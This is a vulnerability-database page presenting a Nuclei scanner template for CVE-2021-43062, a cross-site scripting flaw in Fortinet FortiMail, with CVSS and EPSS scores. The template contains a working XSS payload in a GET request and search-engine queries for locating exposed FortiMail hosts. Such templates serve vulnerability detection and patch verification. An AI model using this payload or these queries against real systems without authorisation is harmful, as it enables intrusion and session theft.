Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2021-43062
HistoryFeb 21, 2022 - 12:58 p.m.

Fortinet FortiMail 7.0.1 - Cross-Site Scripting

2022-02-2112:58:24
ProjectDiscovery
github.com
4

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.006 Low

EPSS

Percentile

77.8%

A cross-site scripting vulnerability in FortiMail may allow an unauthenticated attacker to perform an attack via specially crafted HTTP GET requests to the FortiGuard URI protection service.

id: CVE-2021-43062

info:
  name: Fortinet FortiMail 7.0.1 - Cross-Site Scripting
  author: ajaysenr
  severity: medium
  description: A cross-site scripting vulnerability in FortiMail may allow an unauthenticated attacker to perform an attack via specially crafted HTTP GET requests to the FortiGuard URI protection service.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Apply the latest security patch or upgrade to a non-vulnerable version of Fortinet FortiMail.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-43062
    - https://www.fortiguard.com/psirt/FG-IR-21-185
    - https://www.exploit-db.com/exploits/50759
    - https://fortiguard.com/advisory/FG-IR-21-185
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-43062
    cwe-id: CWE-79
    epss-score: 0.00709
    epss-percentile: 0.79992
    cpe: cpe:2.3:a:fortinet:fortimail:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: fortinet
    product: fortimail
    shodan-query: http.title:"fortimail"
    fofa-query:
      - title="fortimail"
      - fortimail && port=443
    google-query: intitle:"fortimail"
  tags: cve,cve2021,fortimail,xss,fortinet,edb

http:
  - method: GET
    path:
      - "{{BaseURL}}/fmlurlsvc/?=&url=https%3A%2F%2Fgoogle.com<Svg%2Fonload%3Dalert(document.domain)>"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<Svg/onload=alert(document.domain)>"
          - "FortiMail Click Protection"
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 490a00463044022029569e4fe08ceb33fa8e4d3ef6822a584a2724dd28500f9949a35990ca33aa7602203a176b5878216b519f045620c214e0d451ac9599c7689b2761046a6b01f184e7:922c64590222798bb761d5b6d8e72950

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.006 Low

EPSS

Percentile

77.8%